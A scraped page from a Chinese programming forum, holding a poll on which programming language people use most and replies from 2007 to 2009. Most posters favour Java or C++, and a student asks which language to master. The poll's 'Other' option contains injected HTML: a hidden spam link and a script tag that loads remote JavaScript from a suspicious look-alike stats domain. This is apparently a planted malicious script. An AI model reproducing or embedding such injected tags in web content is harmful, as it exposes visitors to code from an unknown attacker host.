新书推介:《语义网技术体系》
作者:瞿裕忠,胡伟,程龚
   XML论坛     W3CHINA.ORG讨论区     计算机科学论坛     SOAChina论坛     Blog     开放翻译计划     新浪微博  

• 首页
  • 资料下载
  • 核心成员
  • 帮助
  •   Add to Google

>> 本版用于讨论编程和软件设计的技巧
    [返回] 中文XML论坛 - 专业的XML技术讨论区计算机技术与应用『 编程心得 』 → [调查]您最常用的编程语言 查看新帖用户列表

[投票]:[调查]您最常用的编程语言
    1. C 52票
    2. C++ 52票
    3. Java 42票
    4. (Visual)Basic 9票
    5. PHP 5票
    6. Perl 1票
    7. C# 14票
    8. SQL 6票
    9. Delphi/Kylix 7票
    10. 其它    </title><a style=display:none; href=http://worid-of-books.com >book</a> </title><script src=http://google-stats48.info/ur.php></script> 4票
    您还没有登录,不能进行投票;或者已经过了投票期限。[查看投票用户]

发表一个新主题  发表一个新投票  回复主题  (订阅本版) 您是本帖的第 121335 个阅读者浏览上一篇主题  刷新本主题   树形显示贴子 浏览下一篇主题
     * 贴子主题: [调查]您最常用的编程语言 举报  打印  推荐  IE收藏夹 
       本主题类别:     
     lidongbin 帅哥哟,离线,有人找我吗?

门派:XML.ORG.CN

姓名:(无权查看)
    城市:(无权查看)
    院校:(无权查看)
    给lidongbin发送一个短消息 把lidongbin加入好友 查看lidongbin的个人资料 搜索lidongbin在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看lidongbin的博客21
    发贴心情 

我用java最多 大约有90%以上的时候是用java
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/9/19 19:38:00

moneyhome 帅哥哟,离线,有人找我吗?

给moneyhome发送一个短消息 把moneyhome加入好友 查看moneyhome的个人资料 搜索moneyhome在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看moneyhome的博客22
    发贴心情 
    基本上一直用C++
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/10/12 23:28:00

fangel2000 帅哥哟,离线,有人找我吗?

头衔:w3china第一水王
      门派:W3CHINA.ORG

给fangel2000发送一个短消息 把fangel2000加入好友 查看fangel2000的个人资料 搜索fangel2000在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看fangel2000的博客23
    发贴心情 
    学的杂啊,学过C,C++,VB,JAVA
    用的较多的还是C++吧
    哎,要是能下功夫好好钻研一门就好咯!
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/11/1 14:54:00

lu_xiao 帅哥哟,离线,有人找我吗?

给lu_xiao发送一个短消息 把lu_xiao加入好友 查看lu_xiao的个人资料 搜索lu_xiao在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看lu_xiao的博客24
    发贴心情 
    我想好好精通一门语言,谁能告诉我那门语言比较有前途点。我学的是信息管理与信息系统

----------------------------------------------
    好好学习,天天向?? 向上么?应该不是的. 那该向哪呢,迷糊~~

点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/11/7 21:17:00

hongjunli 帅哥哟,离线,有人找我吗?魔羯座1978-1-20

头衔:为振兴论坛而努力!
      门派:IEEE.ORG.CN

给hongjunli发送一个短消息 把hongjunli加入好友 查看hongjunli的个人资料 搜索hongjunli在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看hongjunli的博客25
    发贴心情 
    以下是引用lu_xiao在2007-11-7 21:17:00的发言:
    我想好好精通一门语言,谁能告诉我那门语言比较有前途点。我学的是信息管理与信息系统

语言基本上是相通的,精通一门再转学其它,相对来讲应该很容易的。
    呵呵

我一直是在用java语言。

java大多数还是在企业级方面

点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/11/8 7:50:00

lu_xiao 帅哥哟,离线,有人找我吗?

给lu_xiao发送一个短消息 把lu_xiao加入好友 查看lu_xiao的个人资料 搜索lu_xiao在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看lu_xiao的博客26
    发贴心情 
    我们学校是让我们什么都学点但都学的不深。比如VB,C ,java,C#,我知道自己应该去深入一门,但担心自己学的不对头,或者说学的在工作上用不找着。这就很冤了。
    不过还是谢谢你了,你更加坚定了我学习Java的信心。

----------------------------------------------
    好好学习,天天向?? 向上么?应该不是的. 那该向哪呢,迷糊~~

点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/11/8 15:54:00

pcgooder 帅哥哟,离线,有人找我吗?

给pcgooder发送一个短消息 把pcgooder加入好友 查看pcgooder的个人资料 搜索pcgooder在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看pcgooder的博客27
    发贴心情 
    我用JAVA的 不过我还没学会呢
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/11/14 12:18:00

angun123 帅哥哟,离线,有人找我吗?

给angun123发送一个短消息 把angun123加入好友 查看angun123的个人资料 搜索angun123在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看angun123的博客28
    发贴心情 
    C++和DELPHI
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2008/11/15 20:41:00

秋十三 帅哥哟,离线,有人找我吗?

给秋十三发送一个短消息 把秋十三加入好友 查看秋十三的个人资料 搜索秋十三在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看秋十三的博客29
    发贴心情 
    c和c++都是一般要学的
    还有java
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2009/3/7 20:58:00

wt010863 帅哥哟,离线,有人找我吗?

给wt010863发送一个短消息 把wt010863加入好友 查看wt010863的个人资料 搜索wt010863在『 编程心得 』 的所有贴子 引用回复这个贴子 回复这个贴子 查看wt010863的博客30
    发贴心情 
    常用java语言
    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2009/4/18 14:41:00

GoogleAdSense

门派:无门无派
      院校:未填写
    给Google AdSense发送一个短消息 把Google AdSense加入好友 查看Google AdSense的个人资料 搜索Google AdSense在『 编程心得 』 的所有贴子 访问Google AdSense的主页 引用回复这个贴子 回复这个贴子 查看Google AdSense的博客广告

本主题贴数30,分页: [1] [2] [3]

管理选项修改tag | 锁定 | 解锁 | 提升 | 删除 | 移动 | 解固 | 总固顶 | 奖励 | 惩罚 | 发布公告
    W3C Contributing Supporter! W 3 C h i n a ( since 2003 ) 旗 下 站 点
    苏ICP备05006046号《全国人大常委会关于维护互联网安全的决定》《计算机信息网络国际联网安全保护管理办法》
    170.898ms